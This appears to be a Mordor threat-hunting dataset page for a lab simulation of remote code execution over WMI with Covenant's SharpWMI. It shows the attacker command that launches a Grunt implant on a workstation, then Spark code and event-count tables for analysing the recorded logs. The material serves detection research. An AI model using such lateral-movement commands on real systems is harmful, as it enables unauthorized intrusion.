Covenant SharpWMI Exec¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
[‘T1047’] |
Tags |
[‘WMI IWbemServices ExecMethod’] |
Dataset Description¶
This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
|
Network |
Adversary View¶
(wardog) > SharpWMI /command:"action=exec computername=WORKSTATION6 command=\"C:\\Windows\\System32\\GruntHTTP2.exe\""
[*] Host : WORKSTATION6
[*] Command : "C:\\Windows\\System32\\GruntHTTP2.exe"
[*] Creation of process returned : 0
[*] Process ID : 3824
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |492 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|12 |391 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|13 |230 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7 |150 |
|WORKSTATION6.theshire.local|Security |4656 |114 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |76 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|7 |74 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12 |66 |
|WORKSTATION6.theshire.local|Security |4658 |51 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|12 |45 |
|WORKSTATION6.theshire.local|Security |5156 |41 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13 |41 |
|MORDORDC.theshire.local |Security |5158 |39 |
|WORKSTATION6.theshire.local|Security |5158 |37 |
|MORDORDC.theshire.local |Security |5156 |37 |
|WORKSTATION5.theshire.local|Security |5156 |34 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|3 |33 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|13 |33 |
|MORDORDC.theshire.local |Security |4658 |32 |
|WORKSTATION5.theshire.local|Security |5158 |28 |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows